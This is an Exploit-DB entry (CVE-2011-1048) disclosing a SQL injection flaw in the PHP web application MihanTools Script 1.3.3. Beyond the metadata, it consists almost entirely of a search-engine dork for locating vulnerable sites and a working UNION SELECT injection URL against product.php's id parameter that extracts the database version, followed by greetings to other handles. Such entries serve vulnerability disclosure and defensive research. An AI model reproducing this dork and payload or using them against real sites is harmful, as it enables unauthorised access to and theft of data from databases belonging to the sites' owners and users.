MihanTools Script 1.3.3 - SQL Injection Vulnerability

2011-02-09T00:00:00
ID EDB-ID:16143
Type exploitdb
Reporter WHITE_DEVIL
Modified 2011-02-09T00:00:00

Description

MihanTools Script 1.3.3 - SQL Injection Vulnerability. CVE-2011-1048. Webapps exploit for php platform

                                        
                                            # Exploit Title: MihanTools Script SQL Injection Vunerability  
# Platform: php  
# Date: 09.02.2011  
# Author: WHITE_DEVIL  
# Software Link: http://www.mihantools.ir/   
# Version: all version  
# Tested on: Windows Sp2  
# Mail: Mr.web70@yahoo.com  
# Dork: inurl:product.php?id= *Powered by MihanTools* 
# Exploit:  

http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--  
  

# Greetings:  
IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory